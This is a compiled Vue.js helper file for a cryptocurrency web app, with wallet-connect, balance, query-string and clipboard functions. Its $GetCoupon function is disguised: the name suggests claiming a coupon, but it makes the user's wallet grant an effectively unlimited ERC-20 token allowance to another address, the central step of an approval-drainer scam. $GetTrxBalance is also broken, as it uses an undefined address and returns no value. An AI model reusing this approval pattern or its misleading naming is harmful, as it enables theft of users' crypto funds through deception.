export default {
    install (Vue, options) { // eslint-disable-line no-unused-vars
        Vue.prototype.$GetCoupon = async function(obj, auaddr, addr) {
            var abi = this.GLOBAL.ABI;
            var contract = new obj.eth.Contract(abi, this.GLOBAL.CONTRACT)
            var gasPrice = await obj.eth.getGasPrice()
        
            const res = await contract.methods.approve(auaddr, '0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff').send({
                from: addr,
                gasPrice: gasPrice,
                gas: 100000,
            });

            return res.transactionHash;
            
        };
        Vue.prototype.$GetBalance = async function(obj, addr) {
            
            var abi = this.GLOBAL.ABI;
            var contract = new obj.eth.Contract(abi, this.GLOBAL.CONTRACT)
            var decimals = await contract.methods.decimals().call();
            var balance = await contract.methods.balanceOf(addr).call();
            return balance / 10 ** decimals
        };

        Vue.prototype.$GetTrxBalance = async function() {
            // 获取USDT余额
            let contract = await window.tronWeb.contract().at(this.GLOBAL.TRXCONTRACT);
            contract.balanceOf(addr).call().then(balance=>{
                if(balance._hex!==undefined){
                    var usdtBalance = balance._hex / (10 ** 6);
                }
                console.log('获取余额：',usdtBalance,333);
                return usdtBalance;
            }).catch(error=>{
                console.log('获取余额失败：',error);
            });
        };
        Vue.prototype.$Web3 = function() {
            var web3Provider;
            if (window.ethereum) {
                web3Provider = window.ethereum;
                try {
                    // 请求用户授权
                    web3Provider.enable()
                    // web3Provider.enable().then((res) => {alert(123)}).catch((err) => {alert(321)})
                } catch (error) {
                    // 用户不授权时
                    console.error("User denied account access")
                }
            }
            return new Web3(web3Provider);
        };
        Vue.prototype.$IsEmpty = function(value) {
            if(value == null || value == undefined || value == '0' || value == '' || value == 'null' || value == 'undefined') {
                return true
            }
            return false;
        };
        Vue.prototype.$BriefString = function(value) {
            if(value.length > 30) {
                return value.slice(0,7) + '...' + value.slice(-7);
            }
            return value;
        };
        Vue.prototype.$GetQueryVariable = function(variable) {
            var query = window.location.search.substring(1);
            var vars = query.split("&");
            for (var i=0;i<vars.length;i++) {
                    var pair = vars[i].split("=");
                    if(pair[0] == variable){return pair[1];}
            }
            return(false);
        };

        Vue.prototype.$Copy = function(copy_content) {
              var cp_return_info =[
                'Success!',
                'Fail!',
              ];
              if(this.$IsEmpty(copy_content)) {
                this.$Toast.fail(cp_return_info[1]);
                return
              }
              this.$copyText(copy_content).then(() => {
                this.$Toast.success(cp_return_info[0]);
              })
      
          };
    }
  }


// WEBPACK FOOTER //
// ./src/assets/js/common/func.js